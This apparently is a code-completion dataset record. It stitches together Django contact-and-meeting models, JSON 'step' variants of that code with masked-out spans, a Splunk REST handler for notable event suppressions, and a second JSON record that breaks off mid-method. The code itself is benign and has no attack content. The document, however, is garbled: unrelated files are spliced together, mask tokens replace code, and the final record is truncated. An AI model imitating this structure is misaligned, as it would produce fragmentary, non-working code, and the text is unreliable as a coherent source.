('Male', 'Male'),
)
gender = models.CharField(max_length=20, choices=GENDER, null=True)
def __str__(self):
return str(self.nickname) + ' ' + self.last_name + '' + self.first_name
class Contact_type(models.Model):
id_contact_type = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
validation_regexp = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Contact(models.Model):
id_contact = models.AutoField(primary_key=True)
id_person = models.ForeignKey(Person, on_delete=models.PROTECT)
id_contact_type = models.ForeignKey(Contact_type, on_delete=models.PROTECT, null=True)
contact = models.CharField(max_length=100, null=True)
def __str__(self):
return str(self.id_person) + ' ' + str(self.contact)
class Relation_type(models.Model):
id_relation = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Relation(models.Model):
id_relation = models.AutoField(primary_key=True)
id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name="who1")
id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name="who2")
description = models.CharField(max_length=100, null=True)
id_relation_type = models.ForeignKey(Relation_type, on_delete=models.CASCADE)
class Meeting(models.Model):
id_meeting = models.AutoField(primary_key=True)
start_date = models.DateField(max_length=100)
start_time = models.TimeField(max_length=100)
description = models.CharField(max_length=100, null=True, default='')
duration = models.DurationField(default=0)
id_location = models.ForeignKey(Location, on_delete=models.CASCADE)
def __str__(self):
return str(self.start_time) + " - " + str(self.start_date) + " " + str(self.duration) + " " + str(
self.description) + " " + str(self.id_location)
class Person_meeting(models.Model):
id_person = models.ForeignKey(Person, on_delete=models.CASCADE)
id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE, unique=False)
|
normal
|
{
"blob_id": "914f477518918619e0e42184bd03c2a7ed16bb01",
"index": 86,
"step-1": "<mask token>\n\n\nclass Relation_type(models.Model):\n <mask token>\n <mask token>\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n",
"step-2": "<mask token>\n\n\nclass Person(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n",
"step-3": "<mask token>\n\n\nclass Location(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Person(models.Model):\n id_person = models.AutoField(primary_key=True)\n nickname = models.CharField(max_length=100, null=True)\n first_name = models.CharField(max_length=100, null=True)\n last_name = models.CharField(max_length=100, null=True)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE,\n null=True, default=52)\n birth_day = models.DateField(default='1900-01-01')\n height = models.IntegerField(null=True)\n GENDER = ('Female', 'Female'), ('Male', 'Male')\n gender = models.CharField(max_length=20, choices=GENDER, null=True)\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n",
"step-4": "<mask token>\n\n\nclass Location(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return str(self.name) + ' - ' + str(self.country) + ': ' + str(self\n .city)\n\n\nclass Person(models.Model):\n id_person = models.AutoField(primary_key=True)\n nickname = models.CharField(max_length=100, null=True)\n first_name = models.CharField(max_length=100, null=True)\n last_name = models.CharField(max_length=100, null=True)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE,\n null=True, default=52)\n birth_day = models.DateField(default='1900-01-01')\n height = models.IntegerField(null=True)\n GENDER = ('Female', 'Female'), ('Male', 'Male')\n gender = models.CharField(max_length=20, choices=GENDER, null=True)\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n",
"step-5": "from django.db import models\n\n\nclass Location(models.Model):\n id_location = models.AutoField(primary_key=True)\n city = models.CharField(max_length=100, null=True)\n street_name = models.CharField(max_length=100, null=True)\n street_number = models.IntegerField(null=True)\n zip = models.IntegerField(null=True)\n country = models.CharField(max_length=100, null=True)\n name = models.CharField(max_length=100, null=True)\n latitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)\n longitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)\n\n def __str__(self):\n # print('Name', type(self.name), '\\nCountry', type(self.country), '\\nCity', self.city)\n return str(self.name) + ' - ' + str(self.country) + ': ' + str(self.city)\n\n\nclass Person(models.Model):\n id_person = models.AutoField(primary_key=True)\n nickname = models.CharField(max_length=100, null=True)\n first_name = models.CharField(max_length=100, null=True)\n last_name = models.CharField(max_length=100, null=True)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE, null=True, default=52)\n birth_day = models.DateField(default='1900-01-01')\n height = models.IntegerField(null=True)\n GENDER = (\n ('Female', 'Female'),\n ('Male', 'Male'),\n )\n gender = models.CharField(max_length=20, choices=GENDER, null=True)\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name=\"who1\")\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name=\"who2\")\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + \" - \" + str(self.start_date) + \" \" + str(self.duration) + \" \" + str(\n self.description) + \" \" + str(self.id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE, unique=False)\n",
"step-ids": [
9,
18,
20,
21,
24
]
}
|
[
9,
18,
20,
21,
24
] |
"""
Copyright (C) 2005 - 2016 Splunk Inc. All Rights Reserved.
"""
import logging
import sys
if sys.platform == "win32":
import os, msvcrt
msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)
import splunk.admin as admin
import splunk.entity as entity
import splunk.util as util
from notable_event_suppression import NotableEventSuppression
from splunk import ResourceNotFound
from splunk.clilib.bundle_paths import make_splunkhome_path
sys.path.append(make_splunkhome_path(["etc", "apps", "SA-Utils", "lib"]))
from SolnCommon.log import setup_logger, SHORT_FORMAT
logger = setup_logger('suppressions_rest_handler', format=SHORT_FORMAT)
logger.setLevel(logging.INFO)
class InvalidConfigException(Exception):
pass
class InvalidParameterValueException(InvalidConfigException):
"""
Describes a config parameter that has an invalid value.
"""
def __init__(self, field, value, value_must_be):
message = "The value for the parameter '%s' is invalid: %s (was %s)" % (field, value_must_be, value)
super(InvalidConfigException, self).__init__(message)
class UnsupportedParameterException(InvalidConfigException):
"""
Describes a config parameter that is unsupported.
"""
pass
class MissingTransitionException(InvalidConfigException):
"""
Describes a capability that is missing.
"""
def __init__(self, transitions):
self.transitions = transitions
super(InvalidConfigException, self).__init__("Missing transition detected")
def _getFieldValue(args, name, default_value=None, max_length=None):
'''Get the field value from the argument list.'''
# Get the value if defined or the default value if not defined
value = args[name][0] or default_value if name in args else default_value
# Check the length
if value and max_length and len(value) > max_length:
raise admin.ArgValidationException(
'App %s cannot be longer than %s character%s.' % (name, max_length, "s" if max_length > 1 else ""))
return value
def _addToDictIfNonNull(d, name, value):
'''Add the given name and value to the dictionary if the value is not none.
Arguments:
d -- the dictionary to add to
name -- the name of the object to add
value -- the value of the object to add (if not none)
'''
if value is not None:
d[name] = value
class Suppressions(admin.MConfigHandler):
'''
Set up supported arguments
'''
# admin.py constants
REQUESTED_ACTIONS = {'1': 'ACTION_CREATE', '2': 'ACTION_LIST', '4': 'ACTION_EDIT', '8': 'ACTION_REMOVE', '16': 'ACTION_MEMBERS', '32': 'ACTION_RELOAD'}
# Permissions
WRITE_CAPABILITY = 'edit_suppressions'
# Default Params
PARAM_DISABLED = 'disabled'
PARAM_SEARCH = 'search'
PARAM_DESCRIPTION = 'description'
VALID_PARAMS = [PARAM_DISABLED, PARAM_SEARCH, PARAM_DESCRIPTION]
REQUIRED_PARAMS = [PARAM_DISABLED, PARAM_SEARCH]
# Configuration key mapping
CONF_KEY_MAPPING = {'app': 'namespace', 'owner': 'owner'}
# Default Vals
DEFAULT_NAMESPACE = 'SA-ThreatIntelligence'
DEFAULT_OWNER = 'nobody'
DEFAULT_DISABLED = 0
def setup(self):
logger.info('Setting up suppressions_rest_handler')
# set write capability
self.setWriteCapability(Suppressions.WRITE_CAPABILITY)
if self.requestedAction == admin.ACTION_EDIT or self.requestedAction == admin.ACTION_CREATE:
# Fill required params
for arg in Suppressions.REQUIRED_PARAMS:
self.supportedArgs.addReqArg(arg)
# Fill valid params
for arg in Suppressions.VALID_PARAMS:
if arg not in Suppressions.REQUIRED_PARAMS:
self.supportedArgs.addOptArg(arg)
def handleCreate(self, confInfo):
'''Handles creation of a suppression.'''
# Get requested action
actionStr = str(self.requestedAction)
if actionStr in Suppressions.REQUESTED_ACTIONS:
actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]
logger.info('Entering %s', actionStr)
# Refresh
self.handleReload()
name = self.callerArgs.id
args = self.callerArgs.data
# Make sure the name is not empty
if not name or len(name) == 0:
raise admin.ArgValidationException("The name of the suppression must not be empty")
# Make sure the name follows the convention
nameMatch = NotableEventSuppression.suppressionRE.match(name)
if not nameMatch:
raise admin.ArgValidationException("The name of the suppression must follow proper convention")
# Make sure the item does not already exist
if name in self.readConf('eventtypes'):
raise admin.AlreadyExistsException("A suppression entry already exists for %s" % (name))
# Get the field values
disabled = _getFieldValue(args, Suppressions.PARAM_DISABLED)
search = _getFieldValue(args, Suppressions.PARAM_SEARCH)
description = _getFieldValue(args, Suppressions.PARAM_DESCRIPTION)
# Add the field values to a configuration dictionary (that will be verified)
conf = entity.getEntity('saved/eventtypes', '_new', sessionKey=self.getSessionKey())
conf.namespace = self.appName # always save things to SOME app context.
conf.owner = self.context == admin.CONTEXT_APP_AND_USER and self.userName or "-"
conf['name'] = name
_addToDictIfNonNull(conf, Suppressions.PARAM_DISABLED, disabled)
_addToDictIfNonNull(conf, Suppressions.PARAM_SEARCH, search)
_addToDictIfNonNull(conf, Suppressions.PARAM_DESCRIPTION, description)
## Notable Suppression Audit Log Data
log_data = {
'action': 'create',
'suppression': conf['name'][len(NotableEventSuppression.SUPPRESSION_START):],
'user': conf['eai:acl']['owner'],
'status': 'success',
'signature': 'Notable event suppression successfully created'
}
# Check the configuration
try:
Suppressions.checkConf(conf, name)
except InvalidConfigException as e:
e = "The configuration for the new suppression '%s' is invalid and could not be created: %s" % (name, str(e))
logger.error(e)
log_data['status'] = 'failure'
log_data['signature'] = 'Unable to save the event suppression'
logger.error('SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'.format(**log_data))
raise admin.ArgValidationException(e)
# Write out an update to the eventtypes config file
entity.setEntity(conf, sessionKey=self.getSessionKey())
logger.info('Successfully added suppression: %s', name)
# Reload suppressions
self.handleReload()
logger.info('%s completed successfully', actionStr)
logger.info('SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'.format(**log_data))
def handleCustom(self, confInfo):
logger.info('Handling custom action: %s', self.customAction)
if self.customAction == '_autodisable':
expired_count, enabled_count = NotableEventSuppression.disable_expired_suppressions(session_key=self.getSessionKey())
logger.info("%s expired suppressions detected; %s were enabled (now disabled)", expired_count, enabled_count)
else:
self.actionNotImplemented()
def handleList(self, confInfo):
"""
Handles listing of a suppression
"""
# Get requested action
actionStr = str(self.requestedAction)
if actionStr in Suppressions.REQUESTED_ACTIONS:
actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]
logger.info('Entering %s', actionStr)
self.handleReload()
# Get the configurations from suppression.conf
suppressionDict = self.readConfCtx('eventtypes')
# Get all suppressions and provide the relevant options
if suppressionDict != None:
# Check each conf
for stanza, settings in suppressionDict.items():
stanzaMatch = NotableEventSuppression.suppressionRE.match(stanza)
if stanzaMatch:
try:
# Check config
Suppressions.checkConf(settings, stanza, confInfo)
except InvalidConfigException as e:
logger.error("The configuration for suppression '%s' is invalid: %s", stanza, str(e))
logger.info('%s completed successfully', actionStr)
def handleReload(self, confInfo=None, makeCSV=True):
"""
Handles refresh/reload of the configuration options
"""
# Get requested action
actionStr = str(self.requestedAction)
if actionStr in Suppressions.REQUESTED_ACTIONS:
actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]
logger.info('Entering %s', actionStr)
logger.info('Refreshing suppression configurations via properties endpoint')
try:
refreshInfo = entity.refreshEntities('properties/eventtypes', sessionKey=self.getSessionKey())
except Exception as e:
logger.warn('Could not refresh suppression configurations via properties endpoint: %s', str(e))
logger.info('%s completed successfully', actionStr)
def handleEdit(self, confInfo):
"""
Handles edits to the configuration options
"""
# Get requested action
actionStr = str(self.requestedAction)
if actionStr in Suppressions.REQUESTED_ACTIONS:
actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]
logger.info('Entering %s', actionStr)
# Refresh
self.handleReload()
name = self.callerArgs.id
args = self.callerArgs
if name is not None:
# Make sure the name follows the convention
nameMatch = NotableEventSuppression.suppressionRE.match(name)
if not nameMatch:
raise admin.ArgValidationException("The name of the suppression must follow proper convention")
try:
conf = entity.getEntity('saved/eventtypes', name, sessionKey=self.getSessionKey())
except ResourceNotFound:
raise admin.NotFoundException("A suppression configuration with the given name '%s' could not be found" % (name))
else:
# Stop if no name was provided
raise admin.ArgValidationException("No name provided")
## Notable Suppression Audit Log Data
log_data = {
'status': 'success',
'action': 'edit',
'signature': 'Notable event suppression successfully saved',
'suppression': name[len(NotableEventSuppression.SUPPRESSION_START):],
'user': conf['eai:userName']
}
# Create the resulting configuration that would be persisted if the settings provided are applied
for key, val in conf.items():
if key in args.data:
# Set the value to a single space so that the field is set to a blank value
new_value = args[key][0]
if new_value in [None, '']:
new_value = ' '
## If a value other than the 'disabled' param is changed, it
# came from the editor, otherwise the lister.
if key == self.PARAM_DISABLED:
conf_key = util.normalizeBoolean(conf[key], enableStrictMode=True)
new_value = util.normalizeBoolean(new_value, enableStrictMode=True)
if conf_key != new_value:
log_data['action'] = 'disable' if new_value else 'enable'
log_data['signature'] = 'Suppression successfully disabled' if new_value else 'Suppression successfully enabled'
conf[key] = new_value
if key == admin.EAI_ENTRY_ACL:
for k, v in self.CONF_KEY_MAPPING.iteritems():
if k in val and val[k] is not None and len(val[k]) > 0:
setattr(conf, v, val[k])
if conf.namespace is None or len(conf.namespace) == 0:
conf.namespace = Suppressions.DEFAULT_NAMESPACE
if conf.owner is None or len(conf.owner) == 0:
conf.owner = Suppressions.DEFAULT_OWNER
try:
# Check config
Suppressions.checkConf(conf, name)
except InvalidConfigException as e:
e = "The edit attempt for the suppression '%s' produced an invalid configuration: %s" % (name, str(e))
logger.error(e)
log_data['status'] = 'failure'
if log_data['action'] == 'edit':
log_data['signature'] = 'Unable to save the event suppression'
elif log_data['action'] == 'enable':
log_data['signature'] = 'Error occurred while enabling the suppression: ' + str(e)
else:
log_data['signature'] = 'Error occurred while disabling the suppression: ' + str(e)
logger.error('SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'.format(**log_data))
raise admin.ArgValidationException(e)
# Write out an update to the eventtypes config file
entity.setEntity(conf, sessionKey=self.getSessionKey())
# Log that the suppression was updated
logger.info("Successfully updated the '%s' suppression", name)
# Reload suppressions
self.handleReload()
logger.info('%s completed successfully', actionStr)
logger.info('SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'.format(**log_data))
def handleRemove(self, confInfo):
owner = ((self.context == admin.CONTEXT_APP_AND_USER) and self.userName) or "-"
entity.deleteEntity('configs/conf-eventtypes', self.callerArgs.id, namespace=self.appName, owner=owner, sessionKey=self.getSessionKey())
@staticmethod
def checkConf(settings, stanza=None, confInfo=None, throwExceptionOnError=False):
"""
Checks the settings and raises an exception if the configuration is invalid.
"""
# Below is a list of the required fields. The entries in this list will be removed as they
# are observed. An empty list at the end of the config check indicates that all necessary
# fields where provided.
required_fields = Suppressions.REQUIRED_PARAMS[:]
if stanza is not None and confInfo is not None:
# Add each of the settings
for key, val in settings.items():
# Set val to empty if None
if val is None:
val = ''
if key in Suppressions.VALID_PARAMS:
confInfo[stanza].append(key, val)
# Key is eai; Set meta
elif key.startswith(admin.EAI_ENTRY_ACL):
confInfo[stanza].setMetadata(key, val)
# Key is eai; userName/appName
elif key.startswith(admin.EAI_META_PREFIX):
confInfo[stanza].append(key, val)
# Key is not proper
else:
pass
# Check each of the settings individually
logger.info("Checking general settings for the '%s' suppression", stanza)
for key, val in settings.items():
# Set val to empty if None
if val is None:
val = ''
# Check the disabled/selected value
if key == Suppressions.PARAM_DISABLED:
try:
util.normalizeBoolean(val, enableStrictMode=True)
# Remove the field from the list of required fields
try:
required_fields.remove(key)
except ValueError:
pass # Field not available, probably because it is not required
except ValueError:
raise InvalidParameterValueException(key, val, "must be a valid boolean")
elif key in Suppressions.REQUIRED_PARAMS:
# Remove the field from the list of required fields
try:
required_fields.remove(key)
except ValueError:
pass # Field not available, probably because it is not required
elif key in Suppressions.VALID_PARAMS:
pass
# Key is eai
elif key.startswith(admin.EAI_META_PREFIX):
pass
# Key is not proper
else:
if throwExceptionOnError:
raise UnsupportedParameterException()
else:
logger.warn("The configuration for '%s' contains an unsupported parameter: %s", stanza, key)
# Error if some of the required fields were not provided
if len(required_fields) > 0:
raise InvalidConfigException('The following fields must be defined in the configuration but were not: ' + ', '.join(required_fields).strip())
# initialize the handler
admin.init(Suppressions, admin.CONTEXT_APP_AND_USER)
|
normal
|
{
"blob_id": "675dc9467dd6db9c2a429941af56d78d6c0e1c08",
"index": 4135,
"step-1": "<mask token>\n\n\nclass MissingTransitionException(InvalidConfigException):\n \"\"\"\n Describes a capability that is missing.\n \"\"\"\n\n def __init__(self, transitions):\n self.transitions = transitions\n super(InvalidConfigException, self).__init__(\n 'Missing transition detected')\n\n\n<mask token>\n\n\nclass Suppressions(admin.MConfigHandler):\n \"\"\"\n Set up supported arguments\n \"\"\"\n REQUESTED_ACTIONS = {'1': 'ACTION_CREATE', '2': 'ACTION_LIST', '4':\n 'ACTION_EDIT', '8': 'ACTION_REMOVE', '16': 'ACTION_MEMBERS', '32':\n 'ACTION_RELOAD'}\n WRITE_CAPABILITY = 'edit_suppressions'\n PARAM_DISABLED = 'disabled'\n PARAM_SEARCH = 'search'\n PARAM_DESCRIPTION = 'description'\n VALID_PARAMS = [PARAM_DISABLED, PARAM_SEARCH, PARAM_DESCRIPTION]\n REQUIRED_PARAMS = [PARAM_DISABLED, PARAM_SEARCH]\n CONF_KEY_MAPPING = {'app': 'namespace', 'owner': 'owner'}\n DEFAULT_NAMESPACE = 'SA-ThreatIntelligence'\n DEFAULT_OWNER = 'nobody'\n DEFAULT_DISABLED = 0\n\n def setup(self):\n logger.info('Setting up suppressions_rest_handler')\n self.setWriteCapability(Suppressions.WRITE_CAPABILITY)\n if (self.requestedAction == admin.ACTION_EDIT or self.\n requestedAction == admin.ACTION_CREATE):\n for arg in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addReqArg(arg)\n for arg in Suppressions.VALID_PARAMS:\n if arg not in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addOptArg(arg)\n\n def handleCreate(self, confInfo):\n \"\"\"Handles creation of a suppression.\"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n name = self.callerArgs.id\n args = self.callerArgs.data\n if not name or len(name) == 0:\n raise admin.ArgValidationException(\n 'The name of the suppression must not be empty')\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n if not nameMatch:\n raise admin.ArgValidationException(\n 'The name of the suppression must follow proper convention')\n if name in self.readConf('eventtypes'):\n raise admin.AlreadyExistsException(\n 'A suppression entry already exists for %s' % name)\n disabled = _getFieldValue(args, Suppressions.PARAM_DISABLED)\n search = _getFieldValue(args, Suppressions.PARAM_SEARCH)\n description = _getFieldValue(args, Suppressions.PARAM_DESCRIPTION)\n conf = entity.getEntity('saved/eventtypes', '_new', sessionKey=self\n .getSessionKey())\n conf.namespace = self.appName\n conf.owner = (self.context == admin.CONTEXT_APP_AND_USER and self.\n userName or '-')\n conf['name'] = name\n _addToDictIfNonNull(conf, Suppressions.PARAM_DISABLED, disabled)\n _addToDictIfNonNull(conf, Suppressions.PARAM_SEARCH, search)\n _addToDictIfNonNull(conf, Suppressions.PARAM_DESCRIPTION, description)\n log_data = {'action': 'create', 'suppression': conf['name'][len(\n NotableEventSuppression.SUPPRESSION_START):], 'user': conf[\n 'eai:acl']['owner'], 'status': 'success', 'signature':\n 'Notable event suppression successfully created'}\n try:\n Suppressions.checkConf(conf, name)\n except InvalidConfigException as e:\n e = (\n \"The configuration for the new suppression '%s' is invalid and could not be created: %s\"\n % (name, str(e)))\n logger.error(e)\n log_data['status'] = 'failure'\n log_data['signature'] = 'Unable to save the event suppression'\n logger.error(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n raise admin.ArgValidationException(e)\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n logger.info('Successfully added suppression: %s', name)\n self.handleReload()\n logger.info('%s completed successfully', actionStr)\n logger.info(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n\n def handleCustom(self, confInfo):\n logger.info('Handling custom action: %s', self.customAction)\n if self.customAction == '_autodisable':\n expired_count, enabled_count = (NotableEventSuppression.\n disable_expired_suppressions(session_key=self.getSessionKey()))\n logger.info(\n '%s expired suppressions detected; %s were enabled (now disabled)'\n , expired_count, enabled_count)\n else:\n self.actionNotImplemented()\n\n def handleList(self, confInfo):\n \"\"\"\n Handles listing of a suppression\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n suppressionDict = self.readConfCtx('eventtypes')\n if suppressionDict != None:\n for stanza, settings in suppressionDict.items():\n stanzaMatch = NotableEventSuppression.suppressionRE.match(\n stanza)\n if stanzaMatch:\n try:\n Suppressions.checkConf(settings, stanza, confInfo)\n except InvalidConfigException as e:\n logger.error(\n \"The configuration for suppression '%s' is invalid: %s\"\n , stanza, str(e))\n logger.info('%s completed successfully', actionStr)\n\n def handleReload(self, confInfo=None, makeCSV=True):\n \"\"\"\n Handles refresh/reload of the configuration options\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in 